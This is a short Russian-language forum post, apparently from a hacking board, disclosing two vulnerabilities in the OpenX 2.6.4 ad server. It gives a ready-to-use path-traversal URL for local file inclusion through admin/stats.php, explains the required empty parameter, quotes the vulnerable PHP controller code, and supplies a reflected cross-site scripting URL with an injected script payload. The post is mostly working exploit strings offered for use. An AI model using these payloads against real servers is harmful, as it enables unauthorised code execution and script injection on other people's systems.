24.04.2010, 09:13
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
С нами:
9154406
Репутация:
2221
|
|
OpenX 2.6.4
LFI
Need: Права админа
/openx/www/admin/stats.php?entity=../../../../../../shell&breakdown=Обязательно пустое.
// shell, у меня там просто в папке с OpenX лежит файл shell.php, там <?PHP phpinfo(); ?> Код выполнился.
Если breakdown не вписать, то будет инклюдиться нечто вроде:
openx/lib/OA/Admin/Statistics/Delivery/Controller/../../../../../../shellAdvertiser.php
PHP код:
// Prepare the stats controller, and populate with the stats
$oStatsController = &OA_Admin_Statistics_Factory::getController($entity . "-" . $breakdown, $aParams);
if (PEAR::isError($oStatsController)) {
phpAds_Die('Error occured', $oStatsController->getMessage());
}
$oStatsController->start();
Ну вроде тот код, т.к. искал по началу в слепую.
Пассивная XSS:
openx/www/admin/stats.php?entity=campaign&breakdown=history&client id=1&campaignid=1'%22%3E%3Cscript%3Ealert();%3C/script%3E
Последний раз редактировалось Ctacok; 24.04.2010 в 09:21..
|
|
|